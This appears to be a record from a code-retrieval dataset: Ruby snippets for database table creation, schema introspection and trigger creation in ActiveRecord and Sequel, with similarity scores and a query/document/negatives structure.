"def extra_columns(base, columns, sub_columns)\n return if @query.is_a?(String) || @sub_query.is_a?(String)\n\n # Add the connect attribute to the query\n if defined?(@connect)\n columns.unshift(@query.arel_table[@connect[0]])\n sub_columns.unshift(@sub_query.arel_table[@connect[0]])\n end\n\n # Build a column to represent the depth of the recursion\n if @depth.present?\n name, start, as = @depth\n col = table[name]\n base.select_extra_values += [col.as(as)] unless as.nil?\n\n columns << ::Arel.sql(start.to_s).as(name)\n sub_columns << (col + ::Arel.sql('1')).as(name)\n end\n\n # Build a column to represent the path of the record access\n if @path.present?\n name, source, as = @path\n source = @query.arel_table[source || @connect[0]]\n\n col = table[name]\n base.select_extra_values += [col.as(as)] unless as.nil?\n parts = [col, source.cast(:varchar)]\n\n columns << ::Arel.array([source]).cast(:varchar, true).as(name)\n sub_columns << ::Arel::Nodes::NamedFunction.new('array_append', parts).as(name)\n end\n end",
"def tables\n raise 'SevenZip#tables should never be called'\n end",
"def _table_name\n self.class.table_name\n end",
"def _table; @table end",
"def table\n Airmodel.client.table base_config[:base_id], base_config[:table_name]\n end",
"def tables; ActiveRecord::Base.connection.tables; end",
"def base_tables(name = nil)\n # this is untested\n select_values(\"SELECT table_name FROM information_schema.tables\", name)\n end",
"def change\n create_table :pages do |t|\n enable_extension \"hstore\" unless extension_enabled?(\"hstore\")\n t.hstore :settings\n t.timestamps\n end\nend",
"def table_alias_for(table_name)\n table_name.gsub(/\\./, '_')\n end",
"def table_name_prefix(model)\n return model::Base.table_name_prefix rescue \"\"\n end",
"def table_name\n raise \"You must override `table_name' in your class\"\n end",
"def extend_relation_class(klass)\n klass\n end",
"def tnTableCreation(tableName)\n pk_list = @pkList.join(',')\n pk_list = \"#{pk_list},branch_name,node_name\"\n q = QueryBuilder.create_tbl(tableName, pk_list, \"select #{@pkSelect}, 0 as test_id,''::varchar(30) as node_name, ''::varchar(30) as branch_name, ''::varchar(5) as type from #{@fTable} f where 1 = 0\")\n # pp q\n DBConn.exec(q)\n\n # q=\"ALTER TABLE #{tableName} add column test_id int, add column node_name varchar(30), add column branch_name varchar(30), add column type varchar(5);\"\n # DBConn.exec(q)\n # pk=@pkList.join(',')\n # # add index\n # q=\"create index ix_#{tableName}t on #{tableName} (#{pk},branch_name);\"\n # pp q\n # DBConn.exec(q)\n end",
"def create_table_sql(name, generator, options)\n \"#{super}#{create_table_suffix_sql(name, options)}\"\n end",
"def table_name_for_insert\n self.class.to_s.downcase.pluralize\n end",
"def spawn_tables\n\t# pseudo-migration / schema\n\tif !FeedEntry.table_exists?\n\t\tprint \"Creating feed entry table...\\n\"\n\t\tActiveRecord::Base.connection.create_table(:feed_entries) do |t|\n\t\t\tt.column :name, :string\n\t\t\tt.column :content, :string\n\t\t\tt.column :url, :string\n\t\t\tt.column :guid, :string\n\t\t\tt.column :published_at, :datetime\n\t\t\tt.column :feed_id, :integer\n\t\tend\n\tend\n\tif !Feed.table_exists?\n\t\tprint \"Creating feed table...\\n\"\n\t\tActiveRecord::Base.connection.create_table(:feeds) do |t|\n\t\t\tt.column :url, :string\n\t\tend\n\tend\n\tif !Blacklist.table_exists?\n\t\tprint \"Creating blacklist table...\\n\"\n\t\tActiveRecord::Base.connection.create_table(:blacklists) do |t|\n\t\t\tt.column :word, :string\n\t\tend\n\tend\nend",
"def _schema_ds\n @_schema_ds ||= begin\n ds = metadata_dataset.select{[\n pg_attribute[:attname].as(:name),\n SQL::Cast.new(pg_attribute[:atttypid], :integer).as(:oid),\n SQL::Cast.new(basetype[:oid], :integer).as(:base_oid),\n SQL::Function.new(:format_type, basetype[:oid], pg_type[:typtypmod]).as(:db_base_type),\n SQL::Function.new(:format_type, pg_type[:oid], pg_attribute[:atttypmod]).as(:db_type),\n SQL::Function.new(:pg_get_expr, pg_attrdef[:adbin], pg_class[:oid]).as(:default),\n SQL::BooleanExpression.new(:NOT, pg_attribute[:attnotnull]).as(:allow_null),\n SQL::Function.new(:COALESCE, SQL::BooleanExpression.from_value_pairs(pg_attribute[:attnum] => SQL::Function.new(:ANY, pg_index[:indkey])), false).as(:primary_key),\n Sequel[:pg_type][:typtype],\n (~Sequel[Sequel[:elementtype][:oid]=>nil]).as(:is_array),\n ]}.\n from(:pg_class).\n join(:pg_attribute, :attrelid=>:oid).\n join(:pg_type, :oid=>:atttypid).\n left_outer_join(Sequel[:pg_type].as(:basetype), :oid=>:typbasetype).\n left_outer_join(Sequel[:pg_type].as(:elementtype), :typarray=>Sequel[:pg_type][:oid]).\n left_outer_join(:pg_attrdef, :adrelid=>Sequel[:pg_class][:oid], :adnum=>Sequel[:pg_attribute][:attnum]).\n left_outer_join(:pg_index, :indrelid=>Sequel[:pg_class][:oid], :indisprimary=>true).\n where{{pg_attribute[:attisdropped]=>false}}.\n where{pg_attribute[:attnum] > 0}.\n order{pg_attribute[:attnum]}\n\n # :nocov:\n if server_version > 100000\n # :nocov:\n ds = ds.select_append{pg_attribute[:attidentity]}\n\n # :nocov:\n if server_version > 120000\n # :nocov:\n ds = ds.select_append{Sequel.~(pg_attribute[:attgenerated]=>'').as(:generated)}\n end\n end\n\n ds\n end\n end",
"def column_definitions(table_name)\n fields = query(<<~SQL, \"SCHEMA\")\n SELECT a.attname, format_type(a.atttypid, a.atttypmod),\n pg_get_expr(d.adbin, d.adrelid), a.attnotnull, a.atttypid, a.atttypmod,\n c.collname, NULL AS comment,\n #{supports_virtual_columns? ? 'attgenerated' : quote('')} as attgenerated,\n NULL as is_hidden\n FROM pg_attribute a\n LEFT JOIN pg_attrdef d ON a.attrelid = d.adrelid AND a.attnum = d.adnum\n LEFT JOIN pg_type t ON a.atttypid = t.oid\n LEFT JOIN pg_collation c ON a.attcollation = c.oid AND a.attcollation <> t.typcollation\n WHERE a.attrelid = #{quote(quote_table_name(table_name))}::regclass\n AND a.attnum > 0 AND NOT a.attisdropped\n ORDER BY a.attnum\n SQL\n\n crdb_fields = crdb_column_definitions(table_name)\n\n # Use regex comparison because if a type is an array it will\n # have [] appended to the end of it.\n target_types = [\n /geometry/,\n /geography/,\n /interval/,\n /numeric/\n ]\n\n re = Regexp.union(target_types)\n fields.map do |field|\n dtype = field[1]\n field[1] = crdb_fields[field[0]][2].downcase if re.match(dtype)\n field[7] = crdb_fields[field[0]][1]&.gsub!(/^\\'|\\'?$/, '')\n field[9] = true if crdb_fields[field[0]][3]\n field\n end\n fields.delete_if do |field|\n # Don't include rowid column if it is hidden and the primary key\n # is not defined (meaning CRDB implicitly created it).\n if field[0] == CockroachDBAdapter::DEFAULT_PRIMARY_KEY\n field[9] && !primary_key(table_name)\n else\n false # Keep this entry.\n end\n end\n end",
"def supports_drop_table_if_exists?\n supports_create_table_if_not_exists?\n end",
"def supports_table_listing?\n respond_to?(:tables)\n end",
"def table_structure(table_name)\r\n sql = \"SELECT COLUMN_NAME, IIF(COLUMN_DEF = 'NULL', null, COLUMN_DEF) as COLUMN_DEF, TYPE_NAME, NULLABLE from (EXECUTE PROCEDURE sp_GetColumns( NULL, NULL, '#{table_name}', NULL )) spgc where table_cat <> 'system';\"\r\n structure = execute(sql, :skip_logging)\r\n raise(ActiveRecord::StatementInvalid, \"Could not find table '#{table_name}'\") if structure == false\r\n structure\r\n end",
"def table_name\n model_class.table_name\n end",
"def table_name\n model_class.table_name\n end",
"def create_table_joins(klass)\n if join_tables = klass.ann(:self, :join_tables)\n for info in join_tables\n begin\n # UGGLY hack!\n key_type = klass.ann(:oid, :sql).split(\" \").first\n create_join_table_sql(info, key_type).each do |sql|\n exec(sql, false)\n end\n debug \"Created join table '#{info[:table]}'.\" if $DBG\n rescue Object => ex\n if table_already_exists_exception? ex\n debug \"Join table already exists\" if $DBG\n else\n raise\n end\n end\n end\n end\n end",
"def functional_update_schema # abstract\n raise 'abstract'\n end",
"def load_physical_schema(conn, builder)\n builder.indexes{\n conn.tables.each{|table|\n conn.indexes(table).each_pair{|name, defn|\n next if defn[:unique]\n builder.index(name, {:relvar => table, :attributes => defn[:columns]})\n }\n }\n }\n end",
"def createAnalisysTables(conn)\n\t\n\n\t## Table: geo.eoo\n\tconn.exec(\"DROP TABLE IF EXISTS geo.eoo;\")\n\tconn.exec(\"CREATE TABLE geo.eoo(\n\t\t\t gid serial NOT NULL,\n\t\t\t id integer NOT NULL,\n\t\t\t CONSTRAINT eoo_pkey PRIMARY KEY (id),\n\t\t\t CONSTRAINT eoo_id_fkey FOREIGN KEY (id) REFERENCES geo.especies (id));\")\n\tconn.exec(\"SELECT AddGeometryColumn ('geo','eoo','geom',102033,'POLYGON',2);\")\n\tconn.exec(\"ALTER TABLE geo.eoo OWNER TO cncflora;\")\n\n\n\n\t## Table: geo.aoo\n conn.exec(\"DROP TABLE IF EXISTS geo.aoo;\")\n conn.exec(\"CREATE TABLE geo.aoo\n (gid serial NOT NULL,\n id integer,\n CONSTRAINT aoo_id_fkey FOREIGN KEY (id) REFERENCES geo.especies (id));\")\n\tconn.exec(\"SELECT AddGeometryColumn ('geo','aoo','geom',102033,'POLYGON',2);\")\n conn.exec(\"ALTER TABLE geo.aoo OWNER TO cncflora;\")\n\n\n\n\t## Table: geo.subpopulacoes\n\tconn.exec(\"DROP TABLE IF EXISTS geo.subpopulacao_remanescente;\")\n\tconn.exec(\"DROP TABLE IF EXISTS geo.subpopulacao_rodovia;\")\n\tconn.exec(\"DROP TABLE IF EXISTS geo.subpopulacao_mineracao;\")\n\tconn.exec(\"DROP TABLE IF EXISTS geo.subpopulacao_uc;\")\n\t#conn.exec(\"DROP TABLE IF EXISTS geo.subpopulacao_terra_indigena;\")\n\tconn.exec(\"DROP TABLE IF EXISTS geo.subpopulacao_incendios;\")\n\n\tconn.exec(\"DROP TABLE IF EXISTS geo.subpopulacoes;\")\n\tconn.exec(\"CREATE TABLE geo.subpopulacoes(\n\t\t\t gid serial NOT NULL,\n\t\t\t id integer,\n\t\t\t area_total double precision DEFAULT 0.0,\t\t\t \n\t\t\t area_remanescente double precision DEFAULT 0.0,\n\t\t\t area_rodovia double precision DEFAULT 0.0,\n\t\t\t remanescentes_sob_rodovia double precision DEFAULT 0.0,\n\t\t\t area_minerada double precision DEFAULT 0.0,\t\t\t \n\t\t\t area_uc double precision DEFAULT 0.0,\n\t\t\t area_remanescente_uc double precision DEFAULT 0.0,\n\t\t\t area_terra_indigena double precision DEFAULT 0.0,\n\t\t\t area_remanescente_terra_indigena double precision DEFAULT 0.0,\n\t\t\t porcentagem_remanescente double precision DEFAULT 0.0,\n\t\t\t porcentagem_rodovia double precision DEFAULT 0.0,\n\t\t\t porcentagem_minerada double precision DEFAULT 0.0,\n\t\t\t porcentagem_remanescente_rodovia double precision DEFAULT 0.0,\n\t\t\t porcentagem_remanescente_uc double precision DEFAULT 0.0,\n\t\t\t porcentagem_remanescente_terra_indigena double precision DEFAULT 0.0,\n\t\t\t total_incendios integer,\n\t\t\t indice_incendios double precision DEFAULT 0.0,\n\t\t\t CONSTRAINT subpopulacoes_pkey PRIMARY KEY (gid),\n\t\t\t CONSTRAINT subpopulacoes_id_fkey FOREIGN KEY (id) REFERENCES geo.especies (id));\")\n\tconn.exec(\"SELECT AddGeometryColumn ('geo','subpopulacoes','geom',102033,'POLYGON',2);\")\n\tconn.exec(\"ALTER TABLE geo.subpopulacoes OWNER TO cncflora;\")\n\n\n\n\t## Table: geo.subpopulacao_remanescente (relacionamento entre subpopulação, remanescentes e espécies. 
Antiga tabela remanescente_especie)\n\tconn.exec(\"CREATE TABLE geo.subpopulacao_remanescente(\n\t\t\t gid serial,\n\t\t\t gid_subpop integer,\n\t\t\t gid_remanescente integer,\n\t\t\t id integer NOT NULL,\n\t\t\t CONSTRAINT subpopulacao_remanescente_gid_pkey PRIMARY KEY (gid),\n\t\t\t CONSTRAINT subpopulacao_remanescente_gid_remanescente_fkey FOREIGN KEY (gid_remanescente) REFERENCES geo.remanescentes (gid),\n\t\t\t CONSTRAINT subpopulacao_remanescente_subpop_gid_fkey FOREIGN KEY (gid_subpop) REFERENCES geo.subpopulacoes (gid),\n\t\t\t CONSTRAINT subpopulacao_remanescente_id_fkey FOREIGN KEY (id) REFERENCES geo.especies (id));\")\n\tconn.exec(\"ALTER TABLE geo.subpopulacao_remanescente OWNER TO cncflora;\")\n\n\n\n\t## Table: geo.subpopulacao_rodovia\n\tconn.exec(\"CREATE TABLE geo.subpopulacao_rodovia(\n\t\t\t gid serial NOT NULL,\n\t\t\t gid_subpop integer,\n\t\t\t gid_rod integer,\n\t\t\t CONSTRAINT subpopulacao_rodovia_gid_pkey PRIMARY KEY (gid),\n\t\t\t CONSTRAINT subpopulacao_rodovia_gid_rod_fkey FOREIGN KEY (gid_rod) REFERENCES geo.rodovias (gid),\n\t\t\t CONSTRAINT subpopulacao_rodovia_gid_subpop_fkey FOREIGN KEY (gid_subpop) REFERENCES geo.subpopulacoes (gid));\")\n\tconn.exec(\"ALTER TABLE geo.subpopulacao_rodovia OWNER TO cncflora;\")\n\n\n\n\t## Table: geo.subpopulacao_mineracao\n\tconn.exec(\"CREATE TABLE geo.subpopulacao_mineracao(\n\t\t\t gid serial NOT NULL,\n\t\t\t gid_subpop integer,\n\t\t\t gid_mineracao integer,\n\t\t\t CONSTRAINT subpopulacao_mineracao_pkey PRIMARY KEY (gid),\n\t\t\t CONSTRAINT subpopulacao_mineracao_gid_mineracao_fkey FOREIGN KEY (gid_mineracao) REFERENCES geo.mineracao (gid),\n\t\t\t CONSTRAINT subpopulacao_mineracao_gid_subpop_fkey FOREIGN KEY (gid_subpop) REFERENCES geo.subpopulacoes (gid));\")\n\tconn.exec(\"ALTER TABLE geo.subpopulacao_mineracao OWNER TO cncflora;\")\n\n\n\n ## Table: geo.subpopulacao_incendios\n conn.exec(\"CREATE TABLE geo.subpopulacao_incendios(\n gid serial NOT NULL,\n gid_subpop integer,\n ano integer,\n mes integer,\n incendios integer,\n CONSTRAINT subpopulacao_incendios_gid_pkey PRIMARY KEY (gid),\n CONSTRAINT subpopulacao_incendios_gid_subpop_fkey FOREIGN KEY (gid_subpop) REFERENCES geo.subpopulacoes (gid));\")\n conn.exec(\"ALTER TABLE geo.subpopulacao_incendios OWNER TO cncflora;\")\n\n\n\n\t## Table: geo.subpopulacao_uc\n\tconn.exec(\"CREATE TABLE geo.subpopulacao_uc(\n\t\t\t gid serial NOT NULL,\n\t\t\t gid_subpop integer,\n\t\t\t gid_uc integer,\n\t\t\t CONSTRAINT subpopulacao_uc_gid_pkey PRIMARY KEY (gid),\n\t\t\t CONSTRAINT subpopulacao_uc_gid_subpop_fkey FOREIGN KEY (gid_subpop) REFERENCES geo.subpopulacoes (gid),\n\t\t\t CONSTRAINT subpopulacao_uc_gid_uc_fkey FOREIGN KEY (gid_uc) REFERENCES geo.ucs (gid));\")\n\tconn.exec(\"ALTER TABLE geo.subpopulacao_uc OWNER TO cncflora;\")\n\n\n=begin\n ## Table: geo.subpopulacao_terra_indigena\n conn.exec(\"CREATE TABLE geo.subpopulacao_terra_indigena(\n gid serial NOT NULL,\n gid_subpop integer,\n gid_terra_indigena integer,\n CONSTRAINT subpopulacao_terra_indigena_gid_pkey PRIMARY KEY (gid),\n CONSTRAINT subpopulacao_terra_indigena_gid_subpop_fkey FOREIGN KEY (gid_subpop) REFERENCES geo.subpopulacoes (gid),\n CONSTRAINT subpopulacao_terra_indigena_gid_uc_fkey FOREIGN KEY (gid_terra_indigena) REFERENCES geo.terra_indigena (gid));\")\n conn.exec(\"ALTER TABLE geo.subpopulacao_terra_indigena OWNER TO cncflora;\")\n\tputs \"CREATE TABLE - OK\"\n=end\n\n\n\n\t## Tabela: geo.tempos\n\tconn.exec(\"DROP TABLE IF EXISTS geo.tempos;\")\n\tconn.exec(\"CREATE TABLE geo.tempos(id 
integer NOT NULL,\n t_eoo double precision DEFAULT 0.0,\n t_aoo double precision DEFAULT 0.0,\n t_subpop double precision DEFAULT 0.0,\n t_subpop_rem double precision DEFAULT 0.0,\n t_subpop_rod double precision DEFAULT 0.0,\n t_subpop_min double precision DEFAULT 0.0,\n t_subpop_uc double precision DEFAULT 0.0,\n t_area_total_subpop double precision DEFAULT 0.0,\n t_area_rem double precision DEFAULT 0.0,\n t_area_min double precision DEFAULT 0.0,\n t_area_rod double precision DEFAULT 0.0,\n t_area_rem_rod double precision DEFAULT 0.0,\n t_area_uc double precision DEFAULT 0.0,\n t_area_rem_uc double precision DEFAULT 0.0,\n\t\t\t t_incendios_subpop double precision DEFAULT 0.0,\n t_total double precision DEFAULT 0.0,\n CONSTRAINT eoo_fkey FOREIGN KEY (id) REFERENCES geo.especies (id));\")\n conn.exec(\"ALTER TABLE geo.tempos OWNER TO cncflora;\")\n\n\n\n\n\nend",
"def quote_table_name(name)\n schema, name_part = extract_vertica_identifier_from_name(name.to_s)\n\n unless name_part\n quote_column_name(schema)\n else\n table_name, name_part = extract_vertica_identifier_from_name(name_part)\n \"#{quote_column_name(schema)}.#{quote_column_name(table_name)}\"\n end\n end",
"def all\n partitions.group_by { |row| row['table_name'] }.map(&method(:to_tablature_table))\n end",
"def create_table_structure(columns_to_include)\n if @table_created\n @columns.each do |column|\n begin\n ActiveRecord::Schema.add_column(@new_table_name, column[:name], column[:type]) if (columns_to_include.blank? or columns_to_include.include? column[:name])\n rescue\n puts \"Couldnt add field #{column[:name].downcase}\"\n end\n end\n ActiveRecord::Schema.add_column(@new_table_name,\"the_geom\", :geometry,:null => false)\n ActiveRecord::Schema.add_index(@new_table_name,\"the_geom\",:spatial => true)\n end\n end",
"def create_table_structure(columns_to_include)\n if @table_created\n @columns.each do |column|\n begin\n ActiveRecord::Schema.add_column(@new_table_name, column[:name], column[:type]) if (columns_to_include.blank? or columns_to_include.include? column[:name])\n rescue\n puts \"Couldnt add field #{column[:name].downcase}\"\n end\n end\n ActiveRecord::Schema.add_column(@new_table_name,\"the_geom\", :geometry,:null => false)\n ActiveRecord::Schema.add_index(@new_table_name,\"the_geom\",:spatial => true)\n end\n end",
"def table\n end",
"def get_tables\n tables\n end",
"def ext_db_path; end",
"def ext_db_path; end",
"def schema_parse_table(table, opts={})\n ds = dataset\n ds.identifier_output_method = :downcase\n schema_and_table = \"#{\"#{quote_identifier(opts[:schema])}.\" if opts[:schema]}#{quote_identifier(table)}\"\n table_schema = []\n metadata = transaction(opts){|conn| conn.describe_table(schema_and_table)}\n metadata.columns.each do |column|\n table_schema << [\n column.name.downcase.to_sym,\n {\n :type => column.data_type,\n :db_type => column.type_string.split(' ')[0],\n :type_string => column.type_string,\n :charset_form => column.charset_form,\n :char_used => column.char_used?,\n :char_size => column.char_size,\n :data_size => column.data_size,\n :precision => column.precision,\n :scale => column.scale,\n :fsprecision => column.fsprecision,\n :lfprecision => column.lfprecision,\n :allow_null => column.nullable?\n }\n ]\n end\n table_schema.instance_variable_set :@features, {\n :owner => :\"#{metadata.obj_schema.downcase}\",\n :clustered => (metadata.clustered? rescue nil),\n :temporary => (metadata.is_temporary? rescue nil),\n :partitioning => (metadata.partitioned? rescue nil),\n :typed => (metadata.is_typed? rescue nil),\n :index_only => (metadata.index_only? rescue nil)\n }\n table_schema\n end",
"def create_table(table_name)\n # translate into pinyin, then to symbol\n table = trans_pinyin(table_name).to_sym\n DB.create_table table do\n primary_key :id\n String :mid, :unique=>true\n DateTime :created_timestamp\n String :content, :text => true\n String :source\n String :user_id\n String :user_name\n String :user_gender\n Integer :user_status_count\n Integer :user_fansNum\n end\n return table\nend",
"def table_name\n @table_name ||= begin\n schema = self.class.schema_name\n table = self.sqltablename.blank? ? \"PS_#{self.recname}\" : self.sqltablename\n [schema, table].compact.join(\".\")\n end\n end",
"def prepare_extend_sproc(ds)\n ds.with_extend(StoredProcedureMethods)\n end",
"def set_publication_tables(name, tables)\n typed_exec(\"ALTER PUBLICATION #{connection.quote_ident(name)} SET TABLE #{safe_list(tables)}\")\n end",
"def table_filtered?(schema_name, table_type)\n %w[information_schema pg_catalog].include?(schema_name) || table_type !~ /TABLE/i\n end",
"def quote_schema_table(table)\n schema_utility_dataset.quote_schema_table(table)\n end",
"def quote_schema_table(table)\n schema_utility_dataset.quote_schema_table(table)\n end",
"def table_name\n self.class.table_name\n end",
"def setup_db\n ActiveRecord::Schema.define(:version => 1) do\n create_table :users do |t|\n t.string :email, :limit => 255\n t.string :crypted_password, :limit => 255\n \n t.timestamps\n end\n end\n \n ActiveRecord::Schema.define(:version => 1) do\n create_table :labels do |t|\n t.string :type, :limit => 255\n t.string :system_label, :limit => 255\n t.string :label, :limit => 255\n \n t.timestamps\n end\n end\nend"
] |
[
"0.64756",
"0.60287654",
"0.5837757",
"0.5837757",
"0.5830948",
"0.58300763",
"0.5774674",
"0.57068306",
"0.56986165",
"0.56673163",
"0.56058055",
"0.55958223",
"0.55805767",
"0.55375665",
"0.54677045",
"0.5446681",
"0.541099",
"0.54074264",
"0.54019165",
"0.5395756",
"0.53898954",
"0.53552204",
"0.5346166",
"0.5342284",
"0.5337186",
"0.5337186",
"0.5337186",
"0.52876747",
"0.52728784",
"0.5270976",
"0.52545416",
"0.5247675",
"0.5229339",
"0.51999205",
"0.5194053",
"0.5193109",
"0.5163716",
"0.5161827",
"0.51508",
"0.5141807",
"0.51387525",
"0.51260203",
"0.512386",
"0.51163596",
"0.5114671",
"0.5105172",
"0.51032144",
"0.50997895",
"0.5077263",
"0.50772446",
"0.5075727",
"0.5075727",
"0.5075727",
"0.5075727",
"0.5061348",
"0.50601536",
"0.503807",
"0.5034946",
"0.5033914",
"0.5030362",
"0.502868",
"0.50231093",
"0.5019512",
"0.5016189",
"0.501375",
"0.5007192",
"0.5004923",
"0.49945822",
"0.4991165",
"0.49836412",
"0.49820566",
"0.49756053",
"0.49751925",
"0.49731106",
"0.49730244",
"0.49699116",
"0.4963344",
"0.4963344",
"0.49568993",
"0.49562144",
"0.49509472",
"0.49466497",
"0.49439624",
"0.4942627",
"0.49410114",
"0.49410114",
"0.4940608",
"0.49359664",
"0.49295086",
"0.49295086",
"0.49283805",
"0.49194273",
"0.49167052",
"0.4914664",
"0.4911254",
"0.49103314",
"0.49090675",
"0.49090675",
"0.49083117",
"0.49072546"
] |
0.5480449
|
14
|
SQL for creating a database trigger.
|
def create_trigger_sql(table, name, function, opts=OPTS)
events = opts[:events] ? Array(opts[:events]) : [:insert, :update, :delete]
whence = opts[:after] ? 'AFTER' : 'BEFORE'
if filter = opts[:when]
raise Error, "Trigger conditions are not supported for this database" unless supports_trigger_conditions?
filter = " WHEN #{filter_expr(filter)}"
end
"CREATE #{'OR REPLACE ' if opts[:replace]}TRIGGER #{name} #{whence} #{events.map{|e| e.to_s.upcase}.join(' OR ')} ON #{quote_schema_table(table)}#{' FOR EACH ROW' if opts[:each_row]}#{filter} EXECUTE PROCEDURE #{function}(#{Array(opts[:args]).map{|a| literal(a)}.join(', ')})"
end
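# Illustrative usage -- a minimal sketch, not part of the adapter source.
# Assumptions: DB is a hypothetical Sequel::Database, and the accounts table
# and the PL/pgSQL function audit() are made up and assumed to already exist.
# Database#create_trigger executes the SQL built by create_trigger_sql.
DB.create_trigger(:accounts, :audit_tr, :audit,
                  events: [:insert, :update, :delete],
                  each_row: true, after: true)
# SQL sent:
#   CREATE TRIGGER audit_tr AFTER INSERT OR UPDATE OR DELETE ON "accounts"
#   FOR EACH ROW EXECUTE PROCEDURE audit()

# With a :when filter (raises unless supports_trigger_conditions?, i.e.
# PostgreSQL 9.0+); :after is omitted here, so the trigger fires BEFORE:
DB.create_trigger(:accounts, :audit_zero_tr, :audit, events: :update,
                  each_row: true, when: {Sequel[:new][:balance] => 0})
# CREATE TRIGGER audit_zero_tr BEFORE UPDATE ON "accounts"
#   FOR EACH ROW WHEN ("new"."balance" = 0) EXECUTE PROCEDURE audit()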
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def create_trigger(table_name, proc_name, event, options = {})\n\n end",
"def create_trigger(table, name, function, opts=OPTS)\n self << create_trigger_sql(table, name, function, opts)\n end",
"def createTrigger _args\n \"createTrigger _args;\" \n end",
"def create_trigger name, type, table_name, *actions\n create_function \"#{name}_f\", :returns=>'trigger',:as=>'$BODY$' do\n yield\n end\n execute %{CREATE TRIGGER #{name} #{type.to_s.upcase} #{actions.map{|str|str.upcase}.join(' OR ')}\n ON \"#{table_name}\" FOR EACH ROW\n EXECUTE PROCEDURE #{name}_f();}\n end",
"def create_trigger(database, table)\n options = self.options(table)\n\n params = {\n :trigger_name => \"#{options[:rep_prefix]}_#{table}\",\n :table => table,\n :keys => session.send(database).primary_key_names(table),\n :log_table => \"#{options[:rep_prefix]}_pending_changes\",\n :activity_table => \"#{options[:rep_prefix]}_running_flags\",\n :key_sep => options[:key_sep],\n :exclude_rr_activity => false,\n }\n\n event_filter = options[:event_filter]\n params[:filter_conditions] = event_filter.filter_conditions if event_filter.respond_to?(:filter_conditions)\n\n session.send(database).create_replication_trigger params\n end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def add_trigger(table, events, options={})\n events += [:row] if options.delete(:row)\n events += [:before] if options.delete(:before)\n trigger = TriggerDefinition.new(0, table, options[:name], events, options[:function])\n execute trigger.to_sql_create\n end",
"def create_replication_trigger(params)\n create_or_replace_replication_trigger_function params\n\n %w(insert update delete).each do |action|\n execute(<<-end_sql)\n DROP TRIGGER IF EXISTS `#{params[:trigger_name]}_#{action}`;\n end_sql\n\n # The created triggers can handle the case where the trigger procedure\n # is updated (that is: temporarily deleted and recreated) while the\n # trigger is running.\n # For that an MySQL internal exception is raised if the trigger\n # procedure cannot be found. The exception is caught by an trigger\n # internal handler. \n # The handler causes the trigger to retry calling the\n # trigger procedure several times with short breaks in between.\n\n trigger_var = action == 'delete' ? 'OLD' : 'NEW'\n if action == 'update'\n call_statement = \"CALL `#{params[:trigger_name]}`(#{key_clause('OLD', params)}, #{key_clause('NEW', params)}, '#{action[0,1].upcase}');\"\n else\n call_statement = \"CALL `#{params[:trigger_name]}`(#{key_clause(trigger_var, params)}, null, '#{action[0,1].upcase}');\"\n end\n execute(<<-end_sql)\n CREATE TRIGGER `#{params[:trigger_name]}_#{action}`\n AFTER #{action} ON `#{params[:table]}` FOR EACH ROW BEGIN\n DECLARE number_attempts INT DEFAULT 0;\n DECLARE failed INT;\n DECLARE CONTINUE HANDLER FOR 1305 BEGIN\n DO SLEEP(0.05);\n SET failed = 1;\n SET number_attempts = number_attempts + 1;\n END;\n REPEAT\n SET failed = 0;\n #{call_statement}\n UNTIL failed = 0 OR number_attempts >= 40 END REPEAT;\n END;\n end_sql\n end\n\n end",
"def pgt_trigger(table, trigger_name, function_name, events, definition, opts={})\n create_function(function_name, definition, :language=>:plpgsql, :returns=>:trigger, :replace=>true)\n create_trigger(table, trigger_name, function_name, :events=>events, :each_row=>true, :after=>opts[:after])\n end",
"def trigger_definition(table_name, trigger_name, name = nil)\n raise \"Internal Error: Connection adapter did not override abstract function\"\n end",
"def triggers\n\n end",
"def triggerStatements _args\n \"triggerStatements _args;\" \n end",
"def triggers\n res = select_all <<-SQL\n SELECT n.nspname as schema,\n c.relname as table,\n t.tgname as trigger_name,\n t.tgenabled as enable_mode,\n t.tgdeferrable as is_deferrable,\n t.tginitdeferred as is_initially_deferrable,\n pg_catalog.pg_get_triggerdef(t.oid, true) as trigger_definition\n FROM pg_catalog.pg_trigger t\n INNER JOIN pg_catalog.pg_class c ON c.oid = t.tgrelid\n INNER JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace\n WHERE c.relkind IN ('r', 'v')\n AND NOT t.tgisinternal\n ORDER BY 1, 2, 3;\n SQL\n\n res.inject([]) do |buffer, row|\n schema = row['schema']\n table = row['table']\n trigger_name = row['trigger_name']\n is_deferrable = row['is_deferrable']\n is_initially_deferred = row['is_initially_deferred']\n\n trigger_definition = row['trigger_definition']\n\n is_constraint = is_constraint?(trigger_definition)\n proc_name = parse_proc_name(trigger_definition)\n event = parse_event(trigger_definition, trigger_name)\n condition = parse_condition(trigger_definition)\n\n for_every = !!(trigger_definition =~ /FOR[\\s]EACH[\\s]ROW/) ? :row : :statement\n\n if proc_name && event\n buffer << ::PgSaurus::ConnectionAdapters::TriggerDefinition.new(\n trigger_name,\n proc_name,\n is_constraint,\n event,\n for_every,\n is_deferrable,\n is_initially_deferred,\n condition,\n table,\n schema\n )\n end\n buffer\n end\n end",
"def create_or_replace_replication_trigger_function(params)\n execute(<<-end_sql)\n DROP PROCEDURE IF EXISTS `#{params[:trigger_name]}`;\n end_sql\n \n activity_check = \"\"\n if params[:exclude_rr_activity] then\n activity_check = <<-end_sql\n DECLARE active INT;\n SELECT count(*) INTO active FROM #{params[:activity_table]};\n IF active <> 0 THEN\n LEAVE p;\n END IF;\n end_sql\n end\n\n execute(<<-end_sql)\n CREATE PROCEDURE `#{params[:trigger_name]}`(change_key varchar(2000), change_new_key varchar(2000), change_type varchar(1))\n p: BEGIN\n #{activity_check}\n INSERT INTO #{params[:log_table]}(change_table, change_key, change_new_key, change_type, change_time)\n VALUES('#{params[:table]}', change_key, change_new_key, change_type, now());\n END;\n end_sql\n \n end",
